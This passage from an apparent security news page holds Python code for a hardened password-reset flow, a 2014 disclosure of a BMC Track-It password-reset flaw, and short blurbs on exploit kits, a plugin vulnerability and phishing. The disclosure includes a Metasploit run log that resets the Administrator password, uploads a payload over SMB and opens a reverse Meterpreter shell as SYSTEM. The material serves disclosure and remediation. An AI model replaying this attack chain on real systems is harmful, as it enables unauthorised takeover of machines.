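    return {"id": secrets.token_hex(8), "authenticated_as": None,
            "verified_as": None}


def authenticate(session, username, password):
    """Step 1: the password prompt the UI shows, now enforced server-side."""
    user = USERS.get(username)
    session["authenticated_as"] = None
    if user is None or not hmac.compare_digest(user["password"], password):
        raise ResetFlowError("bad credentials")
    session["authenticated_as"] = username


def register(session, username, question_answers):
    """Step 2: the /Register request. The vulnerable endpoint accepted any
    userName; here it must match the account this session logged in as."""
    if session["authenticated_as"] != username:
        raise ResetFlowError("register needs an authenticated session for "
                             + username)
    USERS[username]["questions"] = dict(question_answers)


def answer_questions(session, username, answers):
    """Step 3: the secret-question check, with the outcome recorded in the
    session rather than trusted from the next request."""
    expected = USERS.get(username, {}).get("questions")
    session["verified_as"] = None
    if not expected:
        raise ResetFlowError("user not registered for password reset")
    given = dict(answers)
    ok = set(given) == set(expected) and all(
        hmac.compare_digest(expected[q], given[q]) for q in expected)
    if not ok:
        raise ResetFlowError("wrong answers")
    session["verified_as"] = username


def reset_password(session, username, new_password):
    """Step 4: the /ResetPassword request. The vulnerable endpoint trusted
    the UserName in the body; here the session must have passed step 3 for
    that same user, and the verification is consumed after one use."""
    if session["verified_as"] is None or session["verified_as"] != username:
        raise ResetFlowError("reset needs a verified session for " + username)
    session["verified_as"] = None
    USERS[username]["password"] = new_password
    return True


def allowed(step, *args):
    """True if `step(*args)` is accepted by the flow, False if it is refused."""
    try:
        step(*args)
        return True
    except ResetFlowError:
        return False
```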

Supplied is a Metasploit auxiliary module which will change the password of
the Administrator user by default, then print the domain, username, and
password to use with psexec in order to log in over SMB.

The Metasploit run below details changing the password with the attached
module. Setting the password to the one reported by the auxiliary module,
psexec is run again and a shell as NT AUTHORITY\SYSTEM is gained.


msf auxiliary(bmc_trackit_pwd_reset) > show options

Module options (auxiliary/gather/bmc_trackit_pwd_reset):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      no        The domain of the user. By default the local user's computer name will be autodetected
   LOCALUSER  Administrator    yes       The local user to change password for
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.57     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to BMC TrackIt
   VHOST                       no        HTTP server virtual host

msf auxiliary(bmc_trackit_pwd_reset) > run

[*] Please run the psexec module using:
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1
[*] Auxiliary module execution completed
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec

msf exploit(psexec) >
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1
SMBPass => qGSvnJeuNO!1
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \fNRBQEMV.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (NOAlMwJR - "MBvX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \fNRBQEMV.exe...
[*] Sending stage (769024 bytes) to 192.168.1.57
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668)
at 2014-10-12 00:44:12 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Authored by Brandon Perry

Archie and Astrum: New Players in the Exploit Kit Market

Exploit kits continue to be a critical tool for the propagation of crimeware. New exploit kits have appeared this year, and this post will discuss two of them — Archie and Astrum.


more here...........https://www.f-secure.com/weblog/archives/00002776.html

Critical vulnerability affecting HD FLV Player

We’ve been notified of a critical vulnerability affecting the HD FLV Player plugin for Joomla!, WordPress and custom websites. It was silently patched on Joomla! and WordPress, leaving the custom website version vulnerable.

more here.........http://blog.sucuri.net/2014/12/critical-vulnerability-in-joomla-hd-flv-player-plugin.html

Free SSL certificate from CloudFlare abused in phishing scam

Today we received a phishing email pretending to come from LogMeIn, the popular remote administration tool. It uses a classic scare tactic “We were unable to charge your credit card for the due amount.( Merchant message – Insufficient funds )” to trick the user into opening up a fake invoice

more here.........https://blog.malwarebytes.org/fraud-scam/2014/12/free-ssl-certificate-from-cloudflare-abused-in-phishing-scam/

Analyzing Ponemon Cost of Data Breach

I was recently presenting on the use of statistics for risk analysis at the SIRACon conference held in Minneapolis (Oct. 9th and 10th, 2014). I was explaining how models and algorithms work at a high level: given one or more observations and the outcomes, we build models or algorithms to learn how the observations can help predict the outcome. As examples I used things like CVSS, the Binary Risk Assessment and the Ponemon cost of data breach (CODB) report.

more here..........http://datadrivensecurity.info/blog/posts/2014/Dec/ponemon/